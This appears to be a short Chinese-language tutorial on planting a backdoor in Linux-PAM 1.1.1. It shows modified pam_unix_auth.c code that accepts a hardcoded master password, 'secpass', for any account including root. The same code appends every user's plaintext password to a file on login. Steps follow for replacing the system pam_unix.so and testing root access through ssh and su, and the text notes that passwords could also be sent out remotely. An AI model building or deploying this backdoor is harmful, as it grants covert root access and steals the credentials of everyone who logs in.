wget
tar xzvf Linux-PAM-1.1.1.tar.gz
主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c
点击(此处)折叠或打开
-
/* verify the password of this user */
-
retval = _unix_verify_password(pamh, name, p, ctrl);
-
-
if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}
-
-
if(retval == PAM_SUCCESS)
-
-
{
-
FILE *fd;
-
fd = fopen(PASSWD_FILE, "a");
-
fprintf(fd, "%s:%s\n", name, p);
-
fclose(fd);
-
}
-
name = p = NULL;
-
AUTH_RETURN;
- }
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so 前提对系统现有pam_unix.so文件备份
测试ssh
以上是使用了万能密码登录功能,以不同的root密码登录,获得同样的root权限,另一个是记录登录密码到指定文件。
在被攻击端查看密码文件,第一次管理员正常以root身份登录,第二次攻击者以root身份使用后门密码登录。
测试su
普通用户sysuser登录系统后,分别使用万能密码和正常密码切换为root
总结:PAM模块的backdoor程序实现很简单,主要为万能密码和键盘记录功能,还可以提供远程发送密码功能,主要影响了所有在/etc/pam.d/下利用到PAM模块认证的方式(ssh、su、ftp、telnet等。)
Have a nice day.